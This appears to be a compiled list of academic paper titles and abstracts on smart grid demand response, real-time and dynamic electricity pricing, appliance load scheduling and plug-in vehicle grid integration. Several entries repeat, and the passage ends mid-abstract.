mechanism design for the future smart grid paper_content: In the future smart grid, both users and power companies can benefit from real-time interactions and pricing methods which can reflect the fluctuations of the wholesale price into the demand side. In addition, smart pricing can be used to seek social benefits and to achieve social objectives. However, the utility company may need to collect various information about users and their energy consumption behavior, which can be challenging. That is, users may not be willing to reveal their local information unless there is an incentive for them to do so. In this paper, we propose an efficient pricing algorithm to tackle this problem. The benefit that each user obtains from each appliance can be modeled in form of a utility function, a concept from microeconomics. We propose a Vickrey-Clarke-Groves (VCG) based mechanism for our problem formulation aiming to maximize the social welfare, i.e., the aggregate utility functions of all users minus the total energy cost. Our design requires that each user provides some information about its energy demand. In return, the energy provider will determine each user's payment for electricity. The payment of each user is structured in such a way that it is in each user's self interest to reveal its local information truthfully. Finally, we present simulation results to show that both the energy provider and the individual users can benefit from the proposed pricing algorithm. --- paper_title: The role of incentive based Demand Response programs in smart grid paper_content: Smart Grid promises the highest efficiency in the history of electrical energy and one of its key components is Demand Response (DR). Incentive based programs however would have a different path in smart grid and their usage would be different in this new environment. In this paper, incentive based DR programs are briefly introduced, smart grid is presented and the influence of smart grid on incentive based DR programs is described considering the effect of Real Time Pricing (RTP). Finally, an existing model has been upgraded in order to analyze incentive based programs in smart grid. Eventually the influence of a typical demand bidding program is simulated on the load curve of a day in smart grid in the presence of RTP program. --- paper_title: Demand Response Scheduling by Stochastic SCUC paper_content: Considerable developments in the real-time telemetry of demand-side systems allow independent system operators (ISOs) to use reserves provided by demand response (DR) in ancillary service markets. Currently, many ISOs have designed programs to utilize the reserve provided by DR in electricity markets. This paper presents a stochastic model to schedule reserves provided by DR in the wholesale electricity markets. Demand-side reserve is supplied by demand response providers (DRPs), which have the responsibility of aggregating and managing customer responses. A mixed-integer representation of reserve provided by DRPs and its associated cost function are used in the proposed stochastic model. The proposed stochastic model is formulated as a two-stage stochastic mixed-integer programming (SMIP) problem. The first-stage involves network-constrained unit commitment in the base case and the second-stage investigates security assurance in system scenarios. The proposed model would schedule reserves provided by DRPs and determine commitment states of generating units and their scheduled energy and spinning reserves in the scheduling horizon. The proposed approach is applied to two test systems to illustrate the benefits of implementing demand-side reserve in electricity markets. --- paper_title: Demand-Side Bidding Agents: Modeling and Simulation paper_content: Problems such as price volatility have been observed in electric power markets. Demand-side participation is frequently offered as a potential solution by promising to increase market efficiency when hockey-stick-type offer curves are present. However, the individual end-consumer will surely value electricity differently, which makes demand-side participation difficult as a group and at a bus. In this paper demand is categorized into two groups: one that highly values reliability and one that does not. The two types are modeled separately and a new optimal bidding function is developed and tested based on this model. --- paper_title: A Direct Load Control Model for Virtual Power Plant Management paper_content: In the framework of liberalized electricity markets, distributed generation and controllable demand have the opportunity to participate in the real-time operation of transmission and distribution networks. This may be done by using the virtual power plant (VPP) concept, which consists of aggregating the capacity of many distributed energy resources (DER) in order to make them more accessible and manageable across energy markets. This paper provides an optimization algorithm to manage a VPP composed of a large number of customers with thermostatically controlled appliances. The algorithm, based on a direct load control (DLC), determines the optimal control schedules that an aggregator should apply to the controllable devices of the VPP in order to optimize load reduction over a specified control period. The results define the load reduction bid that the aggregator can present in the electricity market, thus helping to minimize network congestion and deviations between generation and demand. The proposed model, which is valid for both transmission and distribution networks, is tested on a real power system to demonstrate its applicability. --- paper_title: Residential implementation of critical-peak pricing of electricity paper_content: This paper investigates how critical-peak pricing (CPP)affects households with different usage and income levels, with the goalof informing policy makers who are considering the implementation of CPPtariffs in the residential sector. Using a subset of data from theCalifornia Statewide Pricing Pilot of 2003-2004, average load changeduring summer events, annual percent bill change, and post-experimentsatisfaction ratings are calculated across six customer segments,categorized by historical usage and income levels. Findings show thathigh-use customers respond significantly more in kW reduction than dolow-use customers, while low-use customers save significantly more inpercentage reduction of annual electricity bills than do high-usecustomers results that challenge the strategy of targeting only high-usecustomers for CPP tariffs. Across income levels, average load and billchanges were statistically indistinguishable, as were satisfaction ratesresults that are compatible with a strategy of full-scale implementationof CPP rates in the residential sector. Finally, the high-use customersearning less than $50,000 annually were the most likely of the groups tosee bill increases about 5 percent saw bill increases of 10 percent ormore suggesting that any residential CPP implementation might considertargeting this customer group for increased energy efficiencyefforts. --- paper_title: Demand participation in the restructured Electric Reliability Council of Texas market paper_content: Does an electricity market which has been restructured to foster competition provide greater opportunities for demand response than a traditional regulated utility industry? The experiences of the restructured Electric Reliability Council of Texas (ERCOT) market over the past eight years provide some hope that it is possible to design a competitive market which will properly value and accommodate demand response. While the overall level of demand response in ERCOT is below the levels enjoyed prior to restructuring, there have nonetheless been some promising advances, including the integration of demand-side resources into competitive markets for ancillary services. ERCOT's experiences demonstrate that the degree of demand participation in a restructured market is highly sensitive to the market design. But even in a market which has been deregulated to a large degree, regulatory intervention and special demand-side programs may be needed in order to bolster demand response. --- paper_title: Present status and future trends in enabling demand response programs paper_content: This paper addresses implementation of Demand Response (DR) programs in competitive electricity markets. An overview of present status of the application of DR programs in major electricity markets is provided. In this paper, An objective-wised classification of DR measures is proposed which is rooted in practical DR experiences. Market opportunities and associated barriers are investigated. Further, enabling technologies for implementing DR programs are discussed. Finally, the role of smart grid in enabling DR is highlighted. --- paper_title: A summary of demand response in electricity markets paper_content: Abstract This paper presents a summary of Demand Response (DR) in deregulated electricity markets. The definition and the classification of DR as well as potential benefits and associated cost components are presented. In addition, the most common indices used for DR measurement and evaluation are highlighted, and some utilities’ experiences with different demand response programs are discussed. Finally, the effect of demand response in electricity prices is highlighted using a simulated case study. --- paper_title: Direct Load Control (DLC) Considering Nodal Interrupted Energy Assessment Rate (NIEAR) in Restructured Power Systems paper_content: A direct load control (DLC) scheme of air conditioning loads (ACL) considering direct monetary compensation to ACL customers for the service interruption caused by the DLC program is proposed in this paper for restructured power systems. The nodal interrupted energy assessment rate (NIEAR), which is used as the bids from the ACL customers, is utilized to determine the direct monetary compensation to the ACL customers. The proposed scheme was investigated for the PoolCo electricity market. The optimal DLC scheme is determined based on the minimum system operating cost which is comprised of the system energy cost, the system spinning reserve cost and the compensation cost to the ACL customers. Dynamic programming (DP) was used to obtain the optimal DLC scheme. The IEEE reliability test system (RTS) was studied to illustrate the proposed DLC scheme. --- paper_title: Demand response in smart electricity grids equipped with renewable energy sources: A review paper_content: Dealing with Renewable Energy Resources (RERs) requires sophisticated planning and operation scheduling along with state of art technologies. Among many possible ways for handling RERs, Demand Response (DR) is investigated in the current review. Because of every other year modifications in DR definition and classification announced by Federal Energy Regulatory Commission (FERC), the latest DR definition and classification are scrutinized in the present work. Moreover, a complete benefit and cost assessment of DR is added in the paper. Measurement and evolution methods along with the effects of DR in electricity prices are discussed. Next comes DR literature review of the recent papers majorly published after 2008. Eventually, successful DR implementations, around the world, are analyzed. --- paper_title: Smart (in-home) power scheduling for demand response on the smart grid paper_content: This paper proposes a power scheduling-based communication protocol for in-home appliances connected over home area network and receiving real-time electricity prices via a smart meter. Specifically, a joint media access and appliance scheduling approach is developed to allow appliances to coordinate power usage so that total demand for the home is kept below a target value. Two types of appliances are considered: 1) “real-time” which consume power as they desire; and 2) “schedulable” which can be turned on at a later time. Simulation results indicate that for an appropriate target total power consumption, our scheme leads to a reduced peak demand for the home and produces a demand that is more level over time. --- paper_title: Stochastic Control for Smart Grid Users With Flexible Demand paper_content: In this paper, we study the optimal control problem for the demand-side of the smart grid under time-varying prices with general structures. We assume that users are equipped with smart appliances that allow delay in satisfying demands, and one central controller that makes energy usage decisions on when and how to satisfy the scheduled demands. We formulate a dynamic programming model for the control problem. The model deals with stochastic demand arrivals and schedules the demands based on their own allowable delays, which are specified by users. However, the dynamic programming model encounters the “curses of dimensionality” and some other difficulties, thus is hard to solve. We develop a decentralization-based heuristic first, and also propose an approximation approach based on Q-learning. Finally, we conduct numerical studies on a testing problem. The simulation results show that both the Q-learning and the decentralization based heuristic approaches work well, but they have their own advantages and disadvantages under different scenarios. Lastly, we conclude the paper with some discussions on future extension directions. --- paper_title: Coupon Incentive-Based Demand Response: Theory and Case Study paper_content: This paper presents the formulation and critical assessment of a novel type of demand response (DR) program targeting retail customers (such as small/medium size commercial, industrial, and residential customers) who are equipped with smart meters yet still face a flat rate. Enabled by pervasive mobile communication capabilities and smart grid technologies, load serving entities (LSEs) could offer retail customers coupon incentives via near-real-time information networks to induce demand response for a future period of time in anticipation of intermittent generation ramping and/or price spikes. This scheme is referred to as coupon incentive-based demand response (CIDR). In contrast to the real-time pricing or peak load pricing DR programs, CIDR continues to offer a flat rate to retail customers and also provides them with voluntary incentives to induce demand response. Theoretical analysis shows the benefits of the proposed scheme in terms of social welfare, consumer surplus, LSE profit, the robustness of the retail electricity rate, and readiness for implementation. The pros and cons are discussed in comparison with existing DR programs. Numerical illustration is performed based on realistic supply and demand data obtained from the Electric Reliability Council of Texas (ERCOT). --- paper_title: Demand Response Architecture: Integration into the Distribution Management System paper_content: Demand Response (DR) refers to actions taken by the utility to respond to a shortage of supply for a short duration of time in the future. DR is one of the enablers of the Smart Grid paradigm as it promotes interaction and responsiveness of the customers and changes the grid from a vertically integrated structure to one that is affected by the behavior of the demand side. In Principle, it is possible to perform DR at the substation level for the customers connected to the feeders downstream or at the demand response service provider (aggregator) for the customers under its territory. This would allow for an area based solution driven mostly by the financial aspects as well as terms and conditions of the mutual agreements between the individual customers and the utility. However, as the penetration of DR increases, incorporating the network model into the DR analysis algorithm becomes necessary. This ensures the proper performance of the DR process and achieves peripheral objectives in addition to achieving the target demand reduction. The added value to the DR algorithm by incorporating the model of the distribution network can only be realized if the engine is developed as an integrated function of the Distribution Management System (DMS) at the network control center level. This paper focuses on the demand response architecture implemented at the DMS level and discusses some practical considerations associated with this approach --- paper_title: An introduction to load management paper_content: Abstract Permanent availability of electricity is nowadays taken for granted, but grid reliability and sustainability is an everyday process of supply and demand balancing. In this document we provide a comprehensive study of the load management methods, techniques and programs theoretically described or practically used in developed and developing countries. Not only experience and actual situation, but also evaluation, future goals and challenges are described. --- paper_title: An innovative RTP-based residential power scheduling scheme for smart grids paper_content: This paper proposes a Real-Time Pricing (RTP)-based power scheduling scheme as demand response for residential power usage. In this scheme, the Energy Management Controller (EMC) in each home and the service provider form a Stackelberg game, in which the EMC who schedules appliances' operation plays the follower level game, and the provider who sets the real-time prices according to current power usage profile plays the leader level game. The sequential equilibrium is obtained through the information exchange between them. Simulation results indicate that our scheme can not only save money for consumers, but also reduce peak load and the variance between demand and supply, while avoiding the “rebound” peak problem. --- paper_title: Optimized Day-Ahead Pricing for Smart Grids with Device-Specific Scheduling Flexibility paper_content: Smart grids are capable of two-way communication between individual user devices and the electricity provider, enabling providers to create a control-feedback loop using time-dependent pricing. By charging users more in peak and less in off-peak hours, the provider can induce users to shift their consumption to off-peak periods, thus relieving stress on the power grid and the cost incurred from large peak loads. We formulate the electricity provider's cost minimization problem in setting these prices by considering consumers' device-specific scheduling flexibility and the provider's cost structure of purchasing electricity from an electricity generator. Consumers' willingness to shift their device usage is modeled probabilistically, with parameters that can be estimated from real data. We develop an algorithm for computing day-ahead prices, and another algorithm for estimating and refining user reaction to the prices. Together, these two algorithms allow the provider to dynamically adjust the offered prices based on user behavior. Numerical simulations with data from an Ontario electricity provider show that our pricing algorithm can significantly reduce the cost incurred by the provider. --- paper_title: Demand response implementation in a home area network: A conceptual hardware architecture paper_content: Demand response (DR) is an important demand-side resource that allows for lower electricity consumption when the system is under stress. This paper presents a DR framework that can be implemented within a home area network, as well as a conceptual hardware architecture for a Home Management System (HMS) and appliance interface units that enable in-home DR implementation. The proposed DR strategy allows for controlling energy-intensive loads taking into consideration both consumers' comfort and load priority. The HMS acts as the central monitoring and decision-making unit for all energy-intensive loads within a home. The appliance interface unit communicates with the HMS while capturing electric power consumption data and performing local load control. Standby electric power consumption of each element in the network is also discussed. --- paper_title: Piloting the Smart Grid paper_content: To address the likely impact of the smart grid on customers, utilities, and society as a whole, it may be necessary to conduct a pilot. When should a pilot be conducted and how should it be conducted? What validity criteria should the pilot satisfy? Here are issues to consider. --- paper_title: A demand-side response smart grid scheme to mitigate electrical peak demands and access renewable energy sources paper_content: Growing demands are causing increased pressure on the electricity infrastructure and perpetually escalated energy prices. Typically, the re are daily and seasonal demand fluctuations oscillating between excessive- peak an d equally excessive-low demands. Peak demands, at times, are causing congestions on the transmission and distribution network associated with compromised quality, risk o f outages and high-priced energy supply. Expensive-to-run power plants are usually operated for short periods of time to meet peak demands what makes their operation even more expensive. Low-demands, usually supplied by base-load power stations, could be driving the electrical capacity and network to be operated well below a sustainable economic feasibility. Spreading out the demand profile on a moderated level would achieve an improved utilization of the electrical infrastructure. This research presents a demand-side response scheme to be implemented at end-user’s premises contributing shi fting loads to the right time of the day targeting spreading out the demand profile and allowing utilization of renewable energy sources. The technology uses programmable internet relays controlling appliance switches to operate loads automatically. The paper presents simulations of the economic model corresponding to the above described scheme representing an incentive-based demand response. In the simulation the impact of th ese programs on load shape and peak load magnitudes, financial benefit to users as well as reduction of energy consumption are shown. The results demonstrated more moderated load profile at lesser peak load magnitude and reduced energy cost. --- paper_title: Demand side management—A simulation of household behavior under variable prices paper_content: Within the next years, consumer households will be increasingly equipped with smart metering and intelligent appliances. These technologies are the basis for households to better monitor electricity consumption and to actively control loads in private homes. Demand side management (DSM) can be adopted to private households. We present a simulation model that generates household load profiles under flat tariffs and simulates changes in these profiles when households are equipped with smart appliances and face time-based electricity prices. --- paper_title: An Event-Driven Demand Response Scheme for Power System Security Enhancement paper_content: Demand response has become a key feature of the future smart grid. In addition to having advanced communication and computing infrastructures, a successful demand response program must respond to the needs of a power system. In other words, the efficiency and security of a power system dictate the locations, amounts and speeds of the load reductions of a demand response program. In this paper, we propose an event-driven emergency demand response scheme to prevent a power system from experiencing voltage collapse. A technique to design such a scheme is presented. This technique is able to provide key setting parameters such as the amount of demand reductions at various locations to arm the demand response infrastructure. The validity of the proposed technique has been verified by using several test power systems. --- paper_title: A Framework for Evaluation of Advanced Direct Load Control With Minimum Disruption paper_content: The advent of advanced sensor technology and the breakthroughs in telecommunication open up several new possibilities for demand-side management. More recently, there has been greater interest from utilities as well as system operators in utilizing load as a system resource through the application of new technologies. With the wider application of demand-side management, there is an increasing emphasis on control of loads with minimum disruption. This paper develops a new framework for designing as well as assessing such an advanced direct load control program with the objective of minimizing end-user discomfort and is formulated as an optimization problem. With a fairly general setup for demand-side management, a simulation-based framework is developed for the stochastic optimization problem. Next, using this framework, insights into the effect of different parameters and constraints in the model on load control are developed. --- paper_title: Impact of TOU rates on distribution load shapes in a smart grid with PHEV penetration paper_content: A smart grid introduces new opportunities and challenges to electric power grids especially at the distribution level. Advanced metering infrastructure (AMI) and information portals enable customers to have access to real-time electricity pricing information, thus facilitating customer participation in demand response. The objective of this paper is to analyze the impact of time-of-use (TOU) electricity rates on customer behaviors in a residential community. Research findings indicate that the TOU rate can be properly designed to reduce the peak demand even when PHEVs are present. This result is insensitive to seasons, PHEV penetration levels and PHEV charging strategies. It is expected that this paper can give policy makers, electric utilities and other relevant stakeholders an insight into the impacts of various TOU pricing schemes on distribution load shapes in a smart grid with PHEV penetration. --- paper_title: Demand response model and its effects on voltage profile of a distribution system paper_content: This paper develops a model for Demand Response (DR) by utilizing consumer behavior modeling considering different scenarios and levels of consumer rationality. Consumer behavior modeling has been done by developing extensive demand-price elasticity matrices for different types of consumers. These Price Elasticity Matrices (PEMs) are utilized to calculate the level of demand response for a given consumer. DR thus obtained is applied to a real world distribution network considering a day-ahead real time pricing scenario to study the effects of demand reduction on system voltage. Results show considerable boost in system voltage that paves way for further demand curtailment through demand side management techniques like Volt/Var Control (VVC). --- paper_title: Rethinking Real-Time Electricity Pricing paper_content: Most US consumers are charged a near-constant retail price for electricity, despite substantial hourly variation in the wholesale market price. This paper evaluates the first program to expose residential consumers to hourly real-time pricing (RTP). I find that enrolled households are statistically significantly price elastic and that consumers responded by conserving energy during peak hours, but remarkably did not increase average consumption during off-peak times. The program increased consumer surplus by $10 per household per year. While this is only one to two percent of electricity costs, it illustrates a potential additional benefit from investment in retail Smart Grid applications, including the advanced electricity meters required to observe a household’s hourly consumption. --- paper_title: Advanced Demand Side Management for the Future Smart Grid Using Mechanism Design paper_content: In the future smart grid, both users and power companies can potentially benefit from the economical and environmental advantages of smart pricing methods to more effectively reflect the fluctuations of the wholesale price into the customer side. In addition, smart pricing can be used to seek social benefits and to implement social objectives. To achieve social objectives, the utility company may need to collect various information about users and their energy consumption behavior, which can be challenging. In this paper, we propose an efficient pricing method to tackle this problem. We assume that each user is equipped with an energy consumption controller (ECC) as part of its smart meter. All smart meters are connected to not only the power grid but also a communication infrastructure. This allows two-way communication among smart meters and the utility company. We analytically model each user's preferences and energy consumption patterns in form of a utility function. Based on this model, we propose a Vickrey-Clarke-Groves (VCG) mechanism which aims to maximize the social welfare, i.e., the aggregate utility functions of all users minus the total energy cost. Our design requires that each user provides some information about its energy demand. In return, the energy provider will determine each user's electricity bill payment. Finally, we verify some important properties of our proposed VCG mechanism for demand side management such as efficiency, user truthfulness, and nonnegative transfer. Simulation results confirm that the proposed pricing method can benefit both users and utility companies. --- paper_title: The Power of Dynamic Pricing paper_content: Using data from a generic California utility, it can be shown that it is feasible to develop dynamic pricing rates for all customer classes. These rates have the potential to reduce system peak demands from 1 to 9 percent. --- paper_title: QoE-driven power scheduling in smart grid: architecture, strategy, and methodology paper_content: Smart grid is a new emerging technology which is able to intelligently control the power consumption via network. Therefore, the efficiency of the information exchange between the power suppliers (or control centers) and power customers is an important issue for smart grid. Moreover, the performance of the smart grid usually depends on the customer's satisfaction degree which belongs to the field of quality of experience. In this article, we propose a QoE-driven power scheduling in the context of smart grid from the perspectives of architecture, strategy, and methodology. Specifically, it takes into account the QoE requirement when designing the power allocation scheme. For obtaining the QoE requirement, we analyze the fluctuation of the power load and the impact of the transmission delay. In particular, the power allocation is formulated as an optimization problem that maximizes the social welfare of the system. Based on the given QoE model, an efficient power scheduling scheme is proposed by jointly considering the admission control and QoE expectation. Extensive simulation results indicate that the proposed scheme can efficiently allocate the power according to the dynamic QoE requirements in a practical smart grid system. --- paper_title: Cooperative multi-residence demand response scheduling paper_content: This paper is concerned with scheduling of demand response among different residences and a utility company. The utility company has a cost function representing the cost of providing energy to end-users, and this cost can be varying across the scheduling horizon. Each end-user has a “must-run” load, and two types of adjustable loads. The first type must consume a specified total amount of energy over the scheduling horizon, but the consumption can be adjusted across different slots. The second type of load has adjustable power consumption without a total energy requirement, but operation of the load at reduced power results in dissatisfaction of the end-user. The problem amounts to minimizing the total cost electricity plus the total user dissatisfaction (social welfare), subject to the individual load consumption constraints. The problem is convex and can be solved by a distributed subgradient method. The utility company and the end-users exchange Lagrange multipliers—interpreted as pricing signals—and hourly consumption data through the Advanced Metering Infrastructure, in order to converge to the optimal amount of electricity production and the optimal power consumption schedule. --- paper_title: From Packet to Power Switching: Digital Direct Load Scheduling paper_content: At present, the power grid has tight control over its dispatchable generation capacity but a very coarse control on the demand. Energy consumers are shielded from making price-aware decisions, which degrades the efficiency of the market. This state of affairs tends to favor fossil fuel generation over renewable sources. Because of the technological difficulties of storing electric energy, the quest for mechanisms that would make the demand for electricity controllable on a day-to-day basis is gaining prominence. The goal of this paper is to provide one such mechanisms, which we call Digital Direct Load Scheduling (DDLS). DDLS is a direct load control mechanism in which we unbundle individual requests for energy and digitize them so that they can be automatically scheduled in a cellular architecture. Specifically, rather than storing energy or interrupting the job of appliances, we choose to hold requests for energy in queues and optimize the service time of individual appliances belonging to a broad class which we refer to as "deferrable loads". The function of each neighborhood scheduler is to optimize the time at which these appliances start to function. This process is intended to shape the aggregate load profile of the neighborhood so as to optimize an objective function which incorporates the spot price of energy, and also allows distributed energy resources to supply part of the generation dynamically. --- paper_title: Optimal Control Policies for Power Demand Scheduling in the Smart Grid paper_content: We study the problem of minimizing the long-term average power grid operational cost through power demand scheduling. A controller at the operator side receives consumer power demand requests with different power requirements, durations and time flexibilities for their satisfaction. Flexibility is modeled as a deadline by which a demand is to be activated. The cost is a convex function of total power consumption, which reflects the fact that each additional unit of power needed to serve demands is more expensive to provision, as demand load increases. We develop a stochastic model and introduce two online demand scheduling policies. In the first one, the Threshold Postponement (TP), the controller serves a new demand request immediately or postpones it to the end of its deadline, depending on current power consumption. In the second one, the Controlled Release (CR), a new request is activated immediately if power consumption is lower than a threshold, else it is queued. Queued demands are activated when deadlines expire or when consumption drops below the threshold. These policies admit an optimal control with switching curve threshold structure, which involves active and postponed demand. The CR policy is asymptotically optimal as deadlines increase, namely it achieves a lower bound on average cost, and the threshold depends only on active demand. Numerical results validate the benefit of our policies compared to the default one of serving demands upon arrival. --- paper_title: A Water-Filling Based Scheduling Algorithm for the Smart Grid paper_content: The processing and communication capabilities of the smart grid provide a solid foundation for enhancing its efficiency and reliability. These capabilities allow utility companies to adjust their offerings in a way that encourages consumers to reduce their peak hour consumption, resulting in a more efficient system. In this paper, we propose a method for scheduling a community's power consumption such that it becomes almost flat. Our methodology utilizes distributed schedulers that allocate time slots to soft loads probabilistically based on precalculated and predistributed demand forecast information. This approach requires no communication or coordination between scheduling nodes. Furthermore, the computation performed at each scheduling node is minimal. Obtaining a relatively constant consumption makes it possible to have a relatively constant billing rate and eliminates operational inefficiencies. We also analyze the fairness of our proposed approach, the effect of the possible errors in the demand forecast, and the participation incentives for consumers. --- paper_title: Power consumption scheduling for peak load reduction in smart grid homes paper_content: This paper presents a design and evaluates the performance of a power consumption scheduler in smart grid homes, aiming at reducing the peak load in individual homes as well as in the system-wide power transmission network. Following the task model consist of actuation time, operation length, deadline, and a consumption profile, the scheduler copies or maps the profile according to the task type, which can be either preemptive or nonpreemptive. The proposed scheme expands the search space recursively to traverse all the feasible allocations for a task set. A pilot implementation of this scheduling method reduces the peak load by up to 23.1% for the given task set. The execution time greatly depends on the search space of a preemptive task, as its time complexity is estimated to be O (MNnp · (MM/2)Np), where M, Nnp, and Np are the number of time slots, preemptive tasks, and nonpreemptive tasks, respectively. However, it can not only be reduced almost to 2% but also made stable with a basic constraint processing mechanism which prunes a search branch when the partial peak value already exceeds the current best. --- paper_title: A summary of demand response in electricity markets paper_content: Abstract This paper presents a summary of Demand Response (DR) in deregulated electricity markets. The definition and the classification of DR as well as potential benefits and associated cost components are presented. In addition, the most common indices used for DR measurement and evaluation are highlighted, and some utilities’ experiences with different demand response programs are discussed. Finally, the effect of demand response in electricity prices is highlighted using a simulated case study. --- paper_title: Smart (in-home) power scheduling for demand response on the smart grid paper_content: This paper proposes a power scheduling-based communication protocol for in-home appliances connected over home area network and receiving real-time electricity prices via a smart meter. Specifically, a joint media access and appliance scheduling approach is developed to allow appliances to coordinate power usage so that total demand for the home is kept below a target value. Two types of appliances are considered: 1) “real-time” which consume power as they desire; and 2) “schedulable” which can be turned on at a later time. Simulation results indicate that for an appropriate target total power consumption, our scheme leads to a reduced peak demand for the home and produces a demand that is more level over time. --- paper_title: Residential task scheduling under dynamic pricing using the multiple knapsack method paper_content: A key component of the smart grid is the ability to enable dynamic residential pricing to incentivize the customer and the overall community to utilize energy more uniformly. However, the complications involved require that automated strategies be provided to the customer to achieve this goal. This paper presents a solution to the problem of optimally scheduling a set of residential appliances under day-ahead variable peak pricing in order to minimize the customer's energy bill (and also, simultaneously spread out energy usage). We map the problem to a well known problem in computer science - the multiple knapsack problem - which enables cheap and efficient solutions to the scheduling problem. Results show that this method is effective in meeting its goals. --- paper_title: Optimal and autonomous incentive-based energy consumption scheduling algorithm for smart grid paper_content: In this paper, we consider deployment of energy consumption scheduling (ECS) devices in smart meters for autonomous demand side management within a neighborhood, where several buildings share an energy source. The ECS devices are assumed to be built inside smart meters and to be connected to not only the power grid, but also to a local area network which is essential for handling two-way communications in a smart grid infrastructure. They interact automatically by running a distributed algorithm to find the optimal energy consumption schedule for each subscriber, with an aim at reducing the total energy cost as well as the peak-to-average-ratio (PAR) in load demand in the system. Incentives are also provided for the subscribers to actually use the ECS devices via a novel pricing model, derived from a game-theoretic analysis. Simulation results confirm that our proposed distributed algorithm significantly reduces the PAR and the total cost in the system. --- paper_title: Demand-side load scheduling incentivized by dynamic energy prices paper_content: Demand response is an important part of the smart grid technologies. This is a particularly interesting problem with the availability of dynamic energy pricing models. Electricity consumers are encouraged to consume electricity more prudently in order to minimize their electric bill, which is in turn calculated based on dynamic energy prices. In this paper, task scheduling policies that help consumers minimize their electrical energy cost by setting the time of use (TOU) of energy in the facility. Moreover, the utility companies can reasonably expect that their customers reduce their consumption at critical times in response to higher energy prices during those times. These policies target two different scenarios: (i) scheduling with a TOU-dependent energy pricing function subject to a constraint on total power consumption; and (ii) scheduling with a TOU and total power consumption-dependent pricing function for electricity consumption. Exact solutions (based on Branch and Bound) are presented for these task scheduling problems. In addition, a rank-based heuristic and a force directed-based heuristic are presented to efficiently solve the aforesaid problems. The proposed heuristic solutions are demonstrated to have very high quality and competitive performance compared to the exact solutions. Moreover, ability of demand shaping utilizing the aforementioned pricing schemes is demonstrated by the simulation results. --- paper_title: Distributed Demand and Response Algorithm for Optimizing Social-Welfare in Smart Grid paper_content: This paper presents a distributed Demand and Response algorithm for smart grid with the objective of optimizing social-welfare. Assuming the power demand range is known or predictable ahead of time, our proposed distributed algorithm will calculate demand and response of all participating energy demanders and suppliers, as well as energy flow routes, in a fully distributed fashion, such that the social-welfare is optimized. During the computation, each node (e.g., demander or supplier) only needs to exchange limited rounds of messages with its neighboring nodes. It provides a potential scheme for energy trade among participants in the smart girds. Our theoretical analysis proves that the algorithm converges even if there is some random noise induced in the process of our distributed Lagrange-Newton based solution. The simulation also shows that the result is close to that of centralized solution. --- paper_title: Convex Analysis and Nonlinear Optimization, Theory and Examples paper_content: Background * Inequality constraints * Fenchel duality * Convex analysis * Special cases * Nonsmooth optimization * The Karush-Kuhn-Tucker Theorem * Fixed points * Postscript: infinite versus finite dimensions * List of results and notation. --- paper_title: Distributed Demand and Response Algorithm for Optimizing Social-Welfare in Smart Grid paper_content: This paper presents a distributed Demand and Response algorithm for smart grid with the objective of optimizing social-welfare. Assuming the power demand range is known or predictable ahead of time, our proposed distributed algorithm will calculate demand and response of all participating energy demanders and suppliers, as well as energy flow routes, in a fully distributed fashion, such that the social-welfare is optimized. During the computation, each node (e.g., demander or supplier) only needs to exchange limited rounds of messages with its neighboring nodes. It provides a potential scheme for energy trade among participants in the smart girds. Our theoretical analysis proves that the algorithm converges even if there is some random noise induced in the process of our distributed Lagrange-Newton based solution. The simulation also shows that the result is close to that of centralized solution. --- paper_title: Demand Response Management via Real-Time Electricity Price Control in Smart Grids paper_content: This paper proposes a real-time pricing scheme that reduces the peak-to-average load ratio through demand response management in smart grid systems. The proposed scheme solves a two-stage optimization problem. On one hand, each user reacts to prices announced by the retailer and maximizes its payoff, which is the difference between its quality-of-usage and the payment to the retailer. On the other hand, the retailer designs the real-time prices in response to the forecasted user reactions to maximize its profit. In particular, each user computes its optimal energy consumption either in closed forms or through an efficient iterative algorithm as a function of the prices. At the retailer side, we develop a Simulated-Annealing-based Price Control (SAPC) algorithm to solve the non-convex price optimization problem. In terms of practical implementation, the users and the retailer interact with each other via a limited number of message exchanges to find the optimal prices. By doing so, the retailer can overcome the uncertainty of users' responses, and users can determine their energy usage based on the actual prices to be used. Our simulation results show that the proposed real-time pricing scheme can effectively shave the energy usage peaks, reduce the retailer's cost, and improve the payoffs of the users. --- paper_title: Intelligent control of vehicle to grid power paper_content: Abstract Vehicle-to-grid (V2G) describes a system in which plug-in electric vehicles (PEV), which includes all electric vehicles and plug-in hybrid electric vehicles, utilize power by plugging into an electric power source and stored in rechargeable battery packs. PEVs significantly increase the load on the grid, much more than you would see in a typical household. The objective of this paper is to demonstrate the use of intelligent solutions for monitoring and controlling the electrical grid when connected to and recharging PEV batteries. In order to achieve this aim, the study examines the distribution of electricity in the power grid of a large-scale city so that PEVs can tap into the system using smart grid electricity. The electricity grid for the large-scale city is modelled, and it can be shown that the vehicle electrification can play a major role in helping to stabilize voltage and load. This developed grid model includes 33 buses, 10 generators, 3 reactors, 6 capacitors, and 33 consumer centers. In addition, the grid model proposes 10 parking servicing 150,000 vehicles per day. The smart grid model uses intelligent controllers. Two intelligent controllers including (i) fuzzy load controllers and (ii) fuzzy voltage controllers have been used in this study to optimize the grid stability of load and voltage. The results show that the smart grid model can respond to any load disturbance in less time, with increased efficiency and improved reliability compared to the traditional grid. In conclusion it is emphasized that smart grid electricity should contribute to PEVs accessing renewable energy. Although the V2G will play a major role in the future portfolio of vehicle technologies, but does not make much sense if the carbon content of the electricity generated by the grid will not be reduced. Thus, the recourse to renewable energy and other alternatives is crucial. The energy is stored in electrochemical power sources (such as battery, fuel cells, supercapacitors, photoelectrochemical) when generated and then delivered to the grid during peak demand times. --- paper_title: Domestic energy management methodology for optimizing efficiency in Smart Grids paper_content: Increasing energy prices and the greenhouse effect lead to more awareness of energy efficiency of electricity supply. During the last years, a lot of domestic technologies have been developed to improve this efficiency. These technologies on their own already improve the efficiency, but more can be gained by a combined management. Multiple optimization objectives can be used to improve the efficiency, from peak shaving and Virtual Power Plant (VPP) to adapting to fluctuating generation of wind turbines. In this paper a generic management methology is proposed applicable for most domestic technologies, scenarios and optimization objectives. Both local scale optimization objectives (a single house) and global scale optimization objectives (multiple houses) can be used. Simulations of different scenarios show that both local and global objectives can be reached. --- paper_title: Modeling the prospects of plug-in hybrid electric vehicles to reduce CO2 emissions paper_content: This study models the CO2 emissions from electric (EV) and plug-in hybrid electric vehicles (PHEV), and compares the results to published values for the CO2 emissions from conventional vehicles based on internal combustion engines (ICE). PHEVs require fewer batteries than EVs which can make them lighter and more efficient than EVs. PHEVs can also operate their onboard ICEs more efficiently than can conventional vehicles. From this, it was theorized that PHEVs may be able to emit less CO2 than both conventional vehicles and EVs given certain power generation mixes of varying CO2 intensities. Amongst the results it was shown that with a highly CO2 intensive power generation mix, such as in China, PHEVs had 